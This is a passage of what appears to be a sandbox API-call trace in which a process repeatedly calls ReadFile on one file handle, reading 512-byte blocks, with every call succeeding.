	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.081] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.082] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.083] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.084] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0088.085] ReadFile (in: hFile=0x234, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
